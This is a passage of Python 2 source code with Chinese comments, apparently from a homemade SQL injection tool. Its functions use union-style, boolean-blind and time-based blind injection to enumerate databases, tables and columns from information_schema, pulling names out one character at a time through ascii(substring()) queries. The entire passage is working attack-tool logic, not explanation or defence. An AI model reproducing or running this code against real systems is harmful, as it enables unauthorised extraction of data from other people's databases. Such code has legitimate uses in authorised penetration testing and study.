%s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = time_injection(select="COUNT(`column_name`)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = time_injection(select="length(`column_name`)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = time_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) # 把注入得到的columns_name列表转为元组 self.columns_name[database_name][table_name] = tuple(columns_name) logger.info("Sqli result:") # 输出所有的列名 for database_name in self.columns_name: tables_name = "" for table_name in self.columns_name[database_name]: tables_name += table_name tables_name += ',' columns_name = "" for column_name in self.columns_name[database_name][table_name]: columns_name += column_name columns_name += ',' logger.info("Table %s has columns %s", table_name, columns_name) logger.info("Database %s has tables %s", database_name, tables_name) print "[*]Columns list:", self.columns_name
def get_database(self): logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") # 先注databases的数量 databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) print "[*] databases_number: %d" % databases_number # 每个循环跑一次databases的数据 for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True): # 首先是database name的长度 logger.debug("Start %dth database length sqli..." % (i + 1)) databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注database name logger.debug("Start %dth database name sqli..." % (i + 1)) databases_name = normal_injection(select='`SCHEMA_NAME`', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = build_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = build_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空database_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = time_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = time_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空databases_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) databases_name = ','.join(self.databases_name) print "[*] databases_name list: " + databases_name
def print_log(log): logger.debug(log + '\n')